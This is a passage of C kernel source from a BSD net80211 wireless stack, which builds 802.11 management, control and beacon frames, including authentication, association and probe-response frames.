IEEE80211_M_HOSTAP) capinfo = IEEE80211_CAPINFO_ESS; else if (vap->iv_opmode == IEEE80211_M_IBSS) capinfo = IEEE80211_CAPINFO_IBSS; else capinfo = 0; if (vap->iv_flags & IEEE80211_F_PRIVACY) capinfo |= IEEE80211_CAPINFO_PRIVACY; if ((ic->ic_flags & IEEE80211_F_SHPREAMBLE) && IEEE80211_IS_CHAN_2GHZ(chan)) capinfo |= IEEE80211_CAPINFO_SHORT_PREAMBLE; if (ic->ic_flags & IEEE80211_F_SHSLOT) capinfo |= IEEE80211_CAPINFO_SHORT_SLOTTIME; if (IEEE80211_IS_CHAN_5GHZ(chan) && (vap->iv_flags & IEEE80211_F_DOTH)) capinfo |= IEEE80211_CAPINFO_SPECTRUM_MGMT; return capinfo; } /* * Send a management frame. The node is for the destination (or ic_bss * when in station mode). Nodes other than ic_bss have their reference * count bumped to reflect our use for an indeterminant time. */ int ieee80211_send_mgmt(struct ieee80211_node *ni, int type, int arg) { #define HTFLAGS (IEEE80211_NODE_HT | IEEE80211_NODE_HTCOMPAT) #define senderr(_x, _v) do { vap->iv_stats._v++; ret = _x; goto bad; } while (0) struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ieee80211_node *bss = vap->iv_bss; struct ieee80211_bpf_params params; struct mbuf *m; uint8_t *frm; uint16_t capinfo; int has_challenge, is_shared_key, ret, status; KASSERT(ni != NULL, ("null node")); /* * Hold a reference on the node so it doesn't go away until after * the xmit is complete all the way in the driver. On error we * will remove our reference. */ IEEE80211_DPRINTF(vap, IEEE80211_MSG_NODE, "ieee80211_ref_node (%s:%u) %p<%s> refcnt %d\n", __func__, __LINE__, ni, ether_sprintf(ni->ni_macaddr), ieee80211_node_refcnt(ni)+1); ieee80211_ref_node(ni); memset(¶ms, 0, sizeof(params)); switch (type) { case IEEE80211_FC0_SUBTYPE_AUTH: status = arg >> 16; arg &= 0xffff; has_challenge = ((arg == IEEE80211_AUTH_SHARED_CHALLENGE || arg == IEEE80211_AUTH_SHARED_RESPONSE) && ni->ni_challenge != NULL); /* * Deduce whether we're doing open authentication or * shared key authentication. We do the latter if * we're in the middle of a shared key authentication * handshake or if we're initiating an authentication * request and configured to use shared key. */ is_shared_key = has_challenge || arg >= IEEE80211_AUTH_SHARED_RESPONSE || (arg == IEEE80211_AUTH_SHARED_REQUEST && bss->ni_authmode == IEEE80211_AUTH_SHARED); m = ieee80211_getmgtframe(&frm, ic->ic_headroom + sizeof(struct ieee80211_frame), 3 * sizeof(uint16_t) + (has_challenge && status == IEEE80211_STATUS_SUCCESS ? sizeof(uint16_t)+IEEE80211_CHALLENGE_LEN : 0) ); if (m == NULL) senderr(ENOMEM, is_tx_nobuf); ((uint16_t *)frm)[0] = (is_shared_key) ? htole16(IEEE80211_AUTH_ALG_SHARED) : htole16(IEEE80211_AUTH_ALG_OPEN); ((uint16_t *)frm)[1] = htole16(arg); /* sequence number */ ((uint16_t *)frm)[2] = htole16(status);/* status */ if (has_challenge && status == IEEE80211_STATUS_SUCCESS) { ((uint16_t *)frm)[3] = htole16((IEEE80211_CHALLENGE_LEN << 8) | IEEE80211_ELEMID_CHALLENGE); memcpy(&((uint16_t *)frm)[4], ni->ni_challenge, IEEE80211_CHALLENGE_LEN); m->m_pkthdr.len = m->m_len = 4 * sizeof(uint16_t) + IEEE80211_CHALLENGE_LEN; if (arg == IEEE80211_AUTH_SHARED_RESPONSE) { IEEE80211_NOTE(vap, IEEE80211_MSG_AUTH, ni, "request encrypt frame (%s)", __func__); /* mark frame for encryption */ params.ibp_flags |= IEEE80211_BPF_CRYPTO; } } else m->m_pkthdr.len = m->m_len = 3 * sizeof(uint16_t); /* XXX not right for shared key */ if (status == IEEE80211_STATUS_SUCCESS) IEEE80211_NODE_STAT(ni, tx_auth); else IEEE80211_NODE_STAT(ni, tx_auth_fail); if (vap->iv_opmode == IEEE80211_M_STA) ieee80211_add_callback(m, ieee80211_tx_mgt_cb, (void *) vap->iv_state); break; case IEEE80211_FC0_SUBTYPE_DEAUTH: IEEE80211_NOTE(vap, IEEE80211_MSG_AUTH, ni, "send station deauthenticate (reason %d)", arg); m = ieee80211_getmgtframe(&frm, ic->ic_headroom + sizeof(struct ieee80211_frame), sizeof(uint16_t)); if (m == NULL) senderr(ENOMEM, is_tx_nobuf); *(uint16_t *)frm = htole16(arg); /* reason */ m->m_pkthdr.len = m->m_len = sizeof(uint16_t); IEEE80211_NODE_STAT(ni, tx_deauth); IEEE80211_NODE_STAT_SET(ni, tx_deauth_code, arg); ieee80211_node_unauthorize(ni); /* port closed */ break; case IEEE80211_FC0_SUBTYPE_ASSOC_REQ: case IEEE80211_FC0_SUBTYPE_REASSOC_REQ: /* * asreq frame format * [2] capability information * [2] listen interval * [6*] current AP address (reassoc only) * [tlv] ssid * [tlv] supported rates * [tlv] extended supported rates * [4] power capability (optional) * [28] supported channels (optional) * [tlv] HT capabilities * [tlv] WME (optional) * [tlv] Vendor OUI HT capabilities (optional) * [tlv] Atheros capabilities (if negotiated) * [tlv] AppIE's (optional) */ m = ieee80211_getmgtframe(&frm, ic->ic_headroom + sizeof(struct ieee80211_frame), sizeof(uint16_t) + sizeof(uint16_t) + IEEE80211_ADDR_LEN + 2 + IEEE80211_NWID_LEN + 2 + IEEE80211_RATE_SIZE + 2 + (IEEE80211_RATE_MAXSIZE - IEEE80211_RATE_SIZE) + 4 + 2 + 26 + sizeof(struct ieee80211_wme_info) + sizeof(struct ieee80211_ie_htcap) + 4 + sizeof(struct ieee80211_ie_htcap) #ifdef IEEE80211_SUPPORT_SUPERG + sizeof(struct ieee80211_ath_ie) #endif + (vap->iv_appie_wpa != NULL ? vap->iv_appie_wpa->ie_len : 0) + (vap->iv_appie_assocreq != NULL ? vap->iv_appie_assocreq->ie_len : 0) ); if (m == NULL) senderr(ENOMEM, is_tx_nobuf); KASSERT(vap->iv_opmode == IEEE80211_M_STA, ("wrong mode %u", vap->iv_opmode)); capinfo = IEEE80211_CAPINFO_ESS; if (vap->iv_flags & IEEE80211_F_PRIVACY) capinfo |= IEEE80211_CAPINFO_PRIVACY; /* * NB: Some 11a AP's reject the request when * short premable is set. */ if ((ic->ic_flags & IEEE80211_F_SHPREAMBLE) && IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) capinfo |= IEEE80211_CAPINFO_SHORT_PREAMBLE; if (IEEE80211_IS_CHAN_ANYG(ic->ic_curchan) && (ic->ic_caps & IEEE80211_C_SHSLOT)) capinfo |= IEEE80211_CAPINFO_SHORT_SLOTTIME; if ((ni->ni_capinfo & IEEE80211_CAPINFO_SPECTRUM_MGMT) && (vap->iv_flags & IEEE80211_F_DOTH)) capinfo |= IEEE80211_CAPINFO_SPECTRUM_MGMT; *(uint16_t *)frm = htole16(capinfo); frm += 2; KASSERT(bss->ni_intval != 0, ("beacon interval is zero!")); *(uint16_t *)frm = htole16(howmany(ic->ic_lintval, bss->ni_intval)); frm += 2; if (type == IEEE80211_FC0_SUBTYPE_REASSOC_REQ) { IEEE80211_ADDR_COPY(frm, bss->ni_bssid); frm += IEEE80211_ADDR_LEN; } frm = ieee80211_add_ssid(frm, ni->ni_essid, ni->ni_esslen); frm = ieee80211_add_rates(frm, &ni->ni_rates); frm = ieee80211_add_rsn(frm, vap); frm = ieee80211_add_xrates(frm, &ni->ni_rates); if (capinfo & IEEE80211_CAPINFO_SPECTRUM_MGMT) { frm = ieee80211_add_powercapability(frm, ic->ic_curchan); frm = ieee80211_add_supportedchannels(frm, ic); } if ((vap->iv_flags_ht & IEEE80211_FHT_HT) && ni->ni_ies.htcap_ie != NULL && ni->ni_ies.htcap_ie[0] == IEEE80211_ELEMID_HTCAP) frm = ieee80211_add_htcap(frm, ni); frm = ieee80211_add_wpa(frm, vap); if ((ic->ic_flags & IEEE80211_F_WME) && ni->ni_ies.wme_ie != NULL) frm = ieee80211_add_wme_info(frm, &ic->ic_wme); if ((vap->iv_flags_ht & IEEE80211_FHT_HT) && ni->ni_ies.htcap_ie != NULL && ni->ni_ies.htcap_ie[0] == IEEE80211_ELEMID_VENDOR) frm = ieee80211_add_htcap_vendor(frm, ni); #ifdef IEEE80211_SUPPORT_SUPERG if (IEEE80211_ATH_CAP(vap, ni, IEEE80211_F_ATHEROS)) { frm = ieee80211_add_ath(frm, IEEE80211_ATH_CAP(vap, ni, IEEE80211_F_ATHEROS), ((vap->iv_flags & IEEE80211_F_WPA) == 0 && ni->ni_authmode != IEEE80211_AUTH_8021X) ? vap->iv_def_txkey : IEEE80211_KEYIX_NONE); } #endif /* IEEE80211_SUPPORT_SUPERG */ if (vap->iv_appie_assocreq != NULL) frm = add_appie(frm, vap->iv_appie_assocreq); m->m_pkthdr.len = m->m_len = frm - mtod(m, uint8_t *); ieee80211_add_callback(m, ieee80211_tx_mgt_cb, (void *) vap->iv_state); break; case IEEE80211_FC0_SUBTYPE_ASSOC_RESP: case IEEE80211_FC0_SUBTYPE_REASSOC_RESP: /* * asresp frame format * [2] capability information * [2] status * [2] association ID * [tlv] supported rates * [tlv] extended supported rates * [tlv] HT capabilities (standard, if STA enabled) * [tlv] HT information (standard, if STA enabled) * [tlv] WME (if configured and STA enabled) * [tlv] HT capabilities (vendor OUI, if STA enabled) * [tlv] HT information (vendor OUI, if STA enabled) * [tlv] Atheros capabilities (if STA enabled) * [tlv] AppIE's (optional) */ m = ieee80211_getmgtframe(&frm, ic->ic_headroom + sizeof(struct ieee80211_frame), sizeof(uint16_t) + sizeof(uint16_t) + sizeof(uint16_t) + 2 + IEEE80211_RATE_SIZE + 2 + (IEEE80211_RATE_MAXSIZE - IEEE80211_RATE_SIZE) + sizeof(struct ieee80211_ie_htcap) + 4 + sizeof(struct ieee80211_ie_htinfo) + 4 + sizeof(struct ieee80211_wme_param) #ifdef IEEE80211_SUPPORT_SUPERG + sizeof(struct ieee80211_ath_ie) #endif + (vap->iv_appie_assocresp != NULL ? vap->iv_appie_assocresp->ie_len : 0) ); if (m == NULL) senderr(ENOMEM, is_tx_nobuf); capinfo = ieee80211_getcapinfo(vap, bss->ni_chan); *(uint16_t *)frm = htole16(capinfo); frm += 2; *(uint16_t *)frm = htole16(arg); /* status */ frm += 2; if (arg == IEEE80211_STATUS_SUCCESS) { *(uint16_t *)frm = htole16(ni->ni_associd); IEEE80211_NODE_STAT(ni, tx_assoc); } else IEEE80211_NODE_STAT(ni, tx_assoc_fail); frm += 2; frm = ieee80211_add_rates(frm, &ni->ni_rates); frm = ieee80211_add_xrates(frm, &ni->ni_rates); /* NB: respond according to what we received */ if ((ni->ni_flags & HTFLAGS) == IEEE80211_NODE_HT) { frm = ieee80211_add_htcap(frm, ni); frm = ieee80211_add_htinfo(frm, ni); } if ((vap->iv_flags & IEEE80211_F_WME) && ni->ni_ies.wme_ie != NULL) frm = ieee80211_add_wme_param(frm, &ic->ic_wme); if ((ni->ni_flags & HTFLAGS) == HTFLAGS) { frm = ieee80211_add_htcap_vendor(frm, ni); frm = ieee80211_add_htinfo_vendor(frm, ni); } #ifdef IEEE80211_SUPPORT_SUPERG if (IEEE80211_ATH_CAP(vap, ni, IEEE80211_F_ATHEROS)) frm = ieee80211_add_ath(frm, IEEE80211_ATH_CAP(vap, ni, IEEE80211_F_ATHEROS), ((vap->iv_flags & IEEE80211_F_WPA) == 0 && ni->ni_authmode != IEEE80211_AUTH_8021X) ? vap->iv_def_txkey : IEEE80211_KEYIX_NONE); #endif /* IEEE80211_SUPPORT_SUPERG */ if (vap->iv_appie_assocresp != NULL) frm = add_appie(frm, vap->iv_appie_assocresp); m->m_pkthdr.len = m->m_len = frm - mtod(m, uint8_t *); break; case IEEE80211_FC0_SUBTYPE_DISASSOC: IEEE80211_NOTE(vap, IEEE80211_MSG_ASSOC, ni, "send station disassociate (reason %d)", arg); m = ieee80211_getmgtframe(&frm, ic->ic_headroom + sizeof(struct ieee80211_frame), sizeof(uint16_t)); if (m == NULL) senderr(ENOMEM, is_tx_nobuf); *(uint16_t *)frm = htole16(arg); /* reason */ m->m_pkthdr.len = m->m_len = sizeof(uint16_t); IEEE80211_NODE_STAT(ni, tx_disassoc); IEEE80211_NODE_STAT_SET(ni, tx_disassoc_code, arg); break; default: IEEE80211_NOTE(vap, IEEE80211_MSG_ANY, ni, "invalid mgmt frame type %u", type); senderr(EINVAL, is_tx_unknownmgt); /* NOTREACHED */ } /* NB: force non-ProbeResp frames to the highest queue */ params.ibp_pri = WME_AC_VO; params.ibp_rate0 = bss->ni_txparms->mgmtrate; /* NB: we know all frames are unicast */ params.ibp_try0 = bss->ni_txparms->maxretry; params.ibp_power = bss->ni_txpower; return ieee80211_mgmt_output(ni, m, type, ¶ms); bad: ieee80211_free_node(ni); return ret; #undef senderr #undef HTFLAGS } /* * Return an mbuf with a probe response frame in it. * Space is left to prepend and 802.11 header at the * front but it's left to the caller to fill in. */ struct mbuf * ieee80211_alloc_proberesp(struct ieee80211_node *bss, int legacy) { struct ieee80211vap *vap = bss->ni_vap; struct ieee80211com *ic = bss->ni_ic; const struct ieee80211_rateset *rs; struct mbuf *m; uint16_t capinfo; uint8_t *frm; /* * probe response frame format * [8] time stamp * [2] beacon interval * [2] cabability information * [tlv] ssid * [tlv] supported rates * [tlv] parameter set (FH/DS) * [tlv] parameter set (IBSS) * [tlv] country (optional) * [3] power control (optional) * [5] channel switch announcement (CSA) (optional) * [tlv] extended rate phy (ERP) * [tlv] extended supported rates * [tlv] RSN (optional) * [tlv] HT capabilities * [tlv] HT information * [tlv] WPA (optional) * [tlv] WME (optional) * [tlv] Vendor OUI HT capabilities (optional) * [tlv] Vendor OUI HT information (optional) * [tlv] Atheros capabilities * [tlv] AppIE's (optional) * [tlv] Mesh ID (MBSS) * [tlv] Mesh Conf (MBSS) */ m = ieee80211_getmgtframe(&frm, ic->ic_headroom + sizeof(struct ieee80211_frame), 8 + sizeof(uint16_t) + sizeof(uint16_t) + 2 + IEEE80211_NWID_LEN + 2 + IEEE80211_RATE_SIZE + 7 /* max(7,3) */ + IEEE80211_COUNTRY_MAX_SIZE + 3 + sizeof(struct ieee80211_csa_ie) + sizeof(struct ieee80211_quiet_ie) + 3 + 2 + (IEEE80211_RATE_MAXSIZE - IEEE80211_RATE_SIZE) + sizeof(struct ieee80211_ie_wpa) + sizeof(struct ieee80211_ie_htcap) + sizeof(struct ieee80211_ie_htinfo) + sizeof(struct ieee80211_ie_wpa) + sizeof(struct ieee80211_wme_param) + 4 + sizeof(struct ieee80211_ie_htcap) + 4 + sizeof(struct ieee80211_ie_htinfo) #ifdef IEEE80211_SUPPORT_SUPERG + sizeof(struct ieee80211_ath_ie) #endif #ifdef IEEE80211_SUPPORT_MESH + 2 + IEEE80211_MESHID_LEN + sizeof(struct ieee80211_meshconf_ie) #endif + (vap->iv_appie_proberesp != NULL ? vap->iv_appie_proberesp->ie_len : 0) ); if (m == NULL) { vap->iv_stats.is_tx_nobuf++; return NULL; } memset(frm, 0, 8); /* timestamp should be filled later */ frm += 8; *(uint16_t *)frm = htole16(bss->ni_intval); frm += 2; capinfo = ieee80211_getcapinfo(vap, bss->ni_chan); *(uint16_t *)frm = htole16(capinfo); frm += 2; frm = ieee80211_add_ssid(frm, bss->ni_essid, bss->ni_esslen); rs = ieee80211_get_suprates(ic, bss->ni_chan); frm = ieee80211_add_rates(frm, rs); if (IEEE80211_IS_CHAN_FHSS(bss->ni_chan)) { *frm++ = IEEE80211_ELEMID_FHPARMS; *frm++ = 5; *frm++ = bss->ni_fhdwell & 0x00ff; *frm++ = (bss->ni_fhdwell >> 8) & 0x00ff; *frm++ = IEEE80211_FH_CHANSET( ieee80211_chan2ieee(ic, bss->ni_chan)); *frm++ = IEEE80211_FH_CHANPAT( ieee80211_chan2ieee(ic, bss->ni_chan)); *frm++ = bss->ni_fhindex; } else { *frm++ = IEEE80211_ELEMID_DSPARMS; *frm++ = 1; *frm++ = ieee80211_chan2ieee(ic, bss->ni_chan); } if (vap->iv_opmode == IEEE80211_M_IBSS) { *frm++ = IEEE80211_ELEMID_IBSSPARMS; *frm++ = 2; *frm++ = 0; *frm++ = 0; /* TODO: ATIM window */ } if ((vap->iv_flags & IEEE80211_F_DOTH) || (vap->iv_flags_ext & IEEE80211_FEXT_DOTD)) frm = ieee80211_add_countryie(frm, ic); if (vap->iv_flags & IEEE80211_F_DOTH) { if (IEEE80211_IS_CHAN_5GHZ(bss->ni_chan)) frm = ieee80211_add_powerconstraint(frm, vap); if (ic->ic_flags & IEEE80211_F_CSAPENDING) frm = ieee80211_add_csa(frm, vap); } if (vap->iv_flags & IEEE80211_F_DOTH) { if (IEEE80211_IS_CHAN_DFS(ic->ic_bsschan) && (vap->iv_flags_ext & IEEE80211_FEXT_DFS)) { if (vap->iv_quiet) frm = ieee80211_add_quiet(frm, vap); } } if (IEEE80211_IS_CHAN_ANYG(bss->ni_chan)) frm = ieee80211_add_erp(frm, ic); frm = ieee80211_add_xrates(frm, rs); frm = ieee80211_add_rsn(frm, vap); /* * NB: legacy 11b clients do not get certain ie's. * The caller identifies such clients by passing * a token in legacy to us. Could expand this to be * any legacy client for stuff like HT ie's. */ if (IEEE80211_IS_CHAN_HT(bss->ni_chan) && legacy != IEEE80211_SEND_LEGACY_11B) { frm = ieee80211_add_htcap(frm, bss); frm = ieee80211_add_htinfo(frm, bss); } frm = ieee80211_add_wpa(frm, vap); if (vap->iv_flags & IEEE80211_F_WME) frm = ieee80211_add_wme_param(frm, &ic->ic_wme); if (IEEE80211_IS_CHAN_HT(bss->ni_chan) && (vap->iv_flags_ht & IEEE80211_FHT_HTCOMPAT) && legacy != IEEE80211_SEND_LEGACY_11B) { frm = ieee80211_add_htcap_vendor(frm, bss); frm = ieee80211_add_htinfo_vendor(frm, bss); } #ifdef IEEE80211_SUPPORT_SUPERG if ((vap->iv_flags & IEEE80211_F_ATHEROS) && legacy != IEEE80211_SEND_LEGACY_11B) frm = ieee80211_add_athcaps(frm, bss); #endif if (vap->iv_appie_proberesp != NULL) frm = add_appie(frm, vap->iv_appie_proberesp); #ifdef IEEE80211_SUPPORT_MESH if (vap->iv_opmode == IEEE80211_M_MBSS) { frm = ieee80211_add_meshid(frm, vap); frm = ieee80211_add_meshconf(frm, vap); } #endif m->m_pkthdr.len = m->m_len = frm - mtod(m, uint8_t *); return m; } /* * Send a probe response frame to the specified mac address. * This does not go through the normal mgt frame api so we * can specify the destination address and re-use the bss node * for the sta reference. */ int ieee80211_send_proberesp(struct ieee80211vap *vap, const uint8_t da[IEEE80211_ADDR_LEN], int legacy) { struct ieee80211_node *bss = vap->iv_bss; struct ieee80211com *ic = vap->iv_ic; struct ieee80211_frame *wh; struct mbuf *m; int ret; if (vap->iv_state == IEEE80211_S_CAC) { IEEE80211_NOTE(vap, IEEE80211_MSG_OUTPUT, bss, "block %s frame in CAC state", "probe response"); vap->iv_stats.is_tx_badstate++; return EIO; /* XXX */ } /* * Hold a reference on the node so it doesn't go away until after * the xmit is complete all the way in the driver. On error we * will remove our reference. */ IEEE80211_DPRINTF(vap, IEEE80211_MSG_NODE, "ieee80211_ref_node (%s:%u) %p<%s> refcnt %d\n", __func__, __LINE__, bss, ether_sprintf(bss->ni_macaddr), ieee80211_node_refcnt(bss)+1); ieee80211_ref_node(bss); m = ieee80211_alloc_proberesp(bss, legacy); if (m == NULL) { ieee80211_free_node(bss); return ENOMEM; } M_PREPEND(m, sizeof(struct ieee80211_frame), M_NOWAIT); KASSERT(m != NULL, ("no room for header")); IEEE80211_TX_LOCK(ic); wh = mtod(m, struct ieee80211_frame *); ieee80211_send_setup(bss, m, IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_PROBE_RESP, IEEE80211_NONQOS_TID, vap->iv_myaddr, da, bss->ni_bssid); /* XXX power management? */ m->m_flags |= M_ENCAP; /* mark encapsulated */ M_WME_SETAC(m, WME_AC_BE); IEEE80211_DPRINTF(vap, IEEE80211_MSG_DEBUG | IEEE80211_MSG_DUMPPKTS, "send probe resp on channel %u to %s%s\n", ieee80211_chan2ieee(ic, ic->ic_curchan), ether_sprintf(da), legacy ? " " : ""); IEEE80211_NODE_STAT(bss, tx_mgmt); ret = ieee80211_raw_output(vap, bss, m, NULL); IEEE80211_TX_UNLOCK(ic); return (ret); } /* * Allocate and build a RTS (Request To Send) control frame. */ struct mbuf * ieee80211_alloc_rts(struct ieee80211com *ic, const uint8_t ra[IEEE80211_ADDR_LEN], const uint8_t ta[IEEE80211_ADDR_LEN], uint16_t dur) { struct ieee80211_frame_rts *rts; struct mbuf *m; /* XXX honor ic_headroom */ m = m_gethdr(M_NOWAIT, MT_DATA); if (m != NULL) { rts = mtod(m, struct ieee80211_frame_rts *); rts->i_fc[0] = IEEE80211_FC0_VERSION_0 | IEEE80211_FC0_TYPE_CTL | IEEE80211_FC0_SUBTYPE_RTS; rts->i_fc[1] = IEEE80211_FC1_DIR_NODS; *(u_int16_t *)rts->i_dur = htole16(dur); IEEE80211_ADDR_COPY(rts->i_ra, ra); IEEE80211_ADDR_COPY(rts->i_ta, ta); m->m_pkthdr.len = m->m_len = sizeof(struct ieee80211_frame_rts); } return m; } /* * Allocate and build a CTS (Clear To Send) control frame. */ struct mbuf * ieee80211_alloc_cts(struct ieee80211com *ic, const uint8_t ra[IEEE80211_ADDR_LEN], uint16_t dur) { struct ieee80211_frame_cts *cts; struct mbuf *m; /* XXX honor ic_headroom */ m = m_gethdr(M_NOWAIT, MT_DATA); if (m != NULL) { cts = mtod(m, struct ieee80211_frame_cts *); cts->i_fc[0] = IEEE80211_FC0_VERSION_0 | IEEE80211_FC0_TYPE_CTL | IEEE80211_FC0_SUBTYPE_CTS; cts->i_fc[1] = IEEE80211_FC1_DIR_NODS; *(u_int16_t *)cts->i_dur = htole16(dur); IEEE80211_ADDR_COPY(cts->i_ra, ra); m->m_pkthdr.len = m->m_len = sizeof(struct ieee80211_frame_cts); } return m; } static void ieee80211_tx_mgt_timeout(void *arg) { struct ieee80211vap *vap = arg; IEEE80211_LOCK(vap->iv_ic); if (vap->iv_state != IEEE80211_S_INIT && (vap->iv_ic->ic_flags & IEEE80211_F_SCAN) == 0) { /* * NB: it's safe to specify a timeout as the reason here; * it'll only be used in the right state. */ ieee80211_new_state_locked(vap, IEEE80211_S_SCAN, IEEE80211_SCAN_FAIL_TIMEOUT); } IEEE80211_UNLOCK(vap->iv_ic); } /* * This is the callback set on net80211-sourced transmitted * authentication request frames. * * This does a couple of things: * * + If the frame transmitted was a success, it schedules a future * event which will transition the interface to scan. * If a state transition _then_ occurs before that event occurs, * said state transition will cancel this callout. * * + If the frame transmit was a failure, it immediately schedules * the transition back to scan. */ static void ieee80211_tx_mgt_cb(struct ieee80211_node *ni, void *arg, int status) { struct ieee80211vap *vap = ni->ni_vap; enum ieee80211_state ostate = (enum ieee80211_state) arg; /* * Frame transmit completed; arrange timer callback. If * transmit was successfuly we wait for response. Otherwise * we arrange an immediate callback instead of doing the * callback directly since we don't know what state the driver * is in (e.g. what locks it is holding). This work should * not be too time-critical and not happen too often so the * added overhead is acceptable. * * XXX what happens if !acked but response shows up before callback? */ if (vap->iv_state == ostate) { callout_reset(&vap->iv_mgtsend, status == 0 ? IEEE80211_TRANS_WAIT*hz : 0, ieee80211_tx_mgt_timeout, vap); } } static void ieee80211_beacon_construct(struct mbuf *m, uint8_t *frm, struct ieee80211_beacon_offsets *bo, struct ieee80211_node *ni) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ieee80211_rateset *rs = &ni->ni_rates; uint16_t capinfo; /* * beacon frame format * [8] time stamp * [2] beacon interval * [2] cabability information * [tlv] ssid * [tlv] supported rates * [3] parameter set (DS) * [8] CF parameter set (optional) * [tlv] parameter set (IBSS/TIM) * [tlv] country (optional) * [3] power control (optional) * [5] channel switch announcement (CSA) (optional) * [tlv] extended rate phy (ERP) * [tlv] extended supported rates * [tlv] RSN parameters * [tlv] HT capabilities * [tlv] HT information * XXX Vendor-specific OIDs (e.g. Atheros) * [tlv] WPA parameters * [tlv] WME parameters * [tlv] Vendor OUI HT capabilities (optional) * [tlv] Vendor OUI HT information (optional) * [tlv] Atheros capabilities (optional) * [tlv] TDMA parameters (optional) * [tlv] Mesh ID (MBSS) * [tlv] Mesh Conf (MBSS) * [tlv] application data (optional) */ memset(bo, 0, sizeof(*bo)); memset(frm, 0, 8); /* XXX timestamp is set by hardware/driver */ frm += 8; *(uint16_t *)frm = htole16(ni->ni_intval); frm += 2; capinfo = ieee80211_getcapinfo(vap, ni->ni_chan); bo->bo_caps = (uint16_t *)frm; *(uint16_t *)frm = htole16(capinfo); frm += 2; *frm++ = IEEE80211_ELEMID_SSID; if ((vap->iv_flags & IEEE80211_F_HIDESSID) == 0) { *frm++ = ni->ni_esslen; memcpy(frm, ni->ni_essid, ni->ni_esslen); frm += ni->ni_esslen; } else *frm++ = 0; frm = ieee80211_add_rates(frm, rs); if (!IEEE80211_IS_CHAN_FHSS(ni->ni_chan)) { *frm++ = IEEE80211_ELEMID_DSPARMS; *frm++ = 1; *frm++ = ieee80211_chan2ieee(ic, ni->ni_chan); } if (ic->ic_flags & IEEE80211_F_PCF) { bo->bo_cfp = frm; frm = ieee80211_add_cfparms(frm, ic); } bo->bo_tim = frm; if (vap->iv_opmode == IEEE80211_M_IBSS) { *frm++ = IEEE80211_ELEMID_IBSSPARMS; *frm++ = 2; *frm++ = 0; *frm++ = 0; /* TODO: ATIM window */ bo->bo_tim_len = 0; } else if (vap->iv_opmode == IEEE80211_M_HOSTAP || vap->iv_opmode == IEEE80211_M_MBSS) { /* TIM IE is the same for Mesh and Hostap */ struct ieee80211_tim_ie *tie = (struct ieee80211_tim_ie *) frm; tie->tim_ie = IEEE80211_ELEMID_TIM; tie->tim_len = 4; /* length */ tie->tim_count = 0; /* DTIM count */ tie->tim_period = vap->iv_dtim_period; /* DTIM period */ tie->tim_bitctl = 0; /* bitmap control */ tie->tim_bitmap[0] = 0; /* Partial Virtual Bitmap */ frm += sizeof(struct ieee80211_tim_ie); bo->bo_tim_len = 1; } bo->bo_tim_trailer = frm; if ((vap->iv_flags & IEEE80211_F_DOTH) || (vap->iv_flags_ext & IEEE80211_FEXT_DOTD)) frm = ieee80211_add_countryie(frm, ic); if (vap->iv_flags & IEEE80211_F_DOTH) { if (IEEE80211_IS_CHAN_5GHZ(ni->ni_chan)) frm = ieee80211_add_powerconstraint(frm, vap); bo->bo_csa = frm; if (ic->ic_flags & IEEE80211_F_CSAPENDING) frm = ieee80211_add_csa(frm, vap); } else bo->bo_csa = frm; if (vap->iv_flags & IEEE80211_F_DOTH) { bo->bo_quiet = frm; if (IEEE80211_IS_CHAN_DFS(ic->ic_bsschan) && (vap->iv_flags_ext & IEEE80211_FEXT_DFS)) { if (vap->iv_quiet) frm = ieee80211_add_quiet(frm,vap); } } else bo->bo_quiet = frm; if (IEEE80211_IS_CHAN_ANYG(ni->ni_chan)) { bo->bo_erp = frm; frm = ieee80211_add_erp(frm, ic); } frm = ieee80211_add_xrates(frm, rs); frm = ieee80211_add_rsn(frm, vap); if (IEEE80211_IS_CHAN_HT(ni->ni_chan)) { frm = ieee80211_add_htcap(frm, ni); bo->bo_htinfo = frm; frm = ieee80211_add_htinfo(frm, ni); } frm = ieee80211_add_wpa(frm, vap); if (vap->iv_flags & IEEE80211_F_WME) { bo->bo_wme = frm; frm = ieee80211_add_wme_param(frm, &ic->ic_wme); } if (IEEE80211_IS_CHAN_HT(ni->ni_chan) && (vap->iv_flags_ht & IEEE80211_FHT_HTCOMPAT)) { frm = ieee80211_add_htcap_vendor(frm, ni); frm = ieee80211_add_htinfo_vendor(frm, ni); } #ifdef IEEE80211_SUPPORT_SUPERG if (vap->iv_flags & IEEE80211_F_ATHEROS) { bo->bo_ath = frm; frm = ieee80211_add_athcaps(frm, ni); } #endif #ifdef IEEE80211_SUPPORT_TDMA if (vap->iv_caps & IEEE80211_C_TDMA) { bo->bo_tdma = frm; frm = ieee80211_add_tdma(frm, vap); } #endif if (vap->iv_appie_beacon != NULL) { bo->bo_appie = frm; bo->bo_appie_len = vap->iv_appie_beacon->ie_len; frm = add_appie(frm, vap->iv_appie_beacon); } #ifdef IEEE80211_SUPPORT_MESH if (vap->iv_opmode == IEEE80211_M_MBSS) { frm = ieee80211_add_meshid(frm, vap); bo->bo_meshconf = frm; frm = ieee80211_add_meshconf(frm, vap); } #endif bo->bo_tim_trailer_len = frm - bo->bo_tim_trailer; bo->bo_csa_trailer_len = frm - bo->bo_csa; m->m_pkthdr.len = m->m_len = frm - mtod(m, uint8_t *); } /* * Allocate a beacon frame and fillin the appropriate bits. */ struct mbuf * ieee80211_beacon_alloc(struct ieee80211_node *ni, struct ieee80211_beacon_offsets *bo) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = vap->iv_ifp; struct ieee80211_frame *wh; struct mbuf *m; int pktlen; uint8_t *frm; /* * beacon frame format * [8] time stamp * [2] beacon interval * [2] cabability information * [tlv] ssid * [tlv] supported rates * [3] parameter set (DS) * [8] CF parameter set (optional) * [tlv] parameter set (IBSS/TIM) * [tlv] country (optional) * [3] power control (optional) * [5] channel switch announcement (CSA) (optional) * [tlv] extended rate phy (ERP) * [tlv] extended supported rates * [tlv] RSN parameters * [tlv] HT capabilities * [tlv] HT information * [tlv] Vendor OUI HT capabilities (optional) * [tlv] Vendor OUI HT information (optional) * XXX Vendor-specific OIDs (e.g. Atheros) * [tlv] WPA parameters * [tlv] WME parameters * [tlv] TDMA parameters (optional) * [tlv] Mesh ID (MBSS) * [tlv] Mesh Conf (MBSS) * [tlv] application data (optional) * NB: we allocate the max space required for the TIM bitmap. * 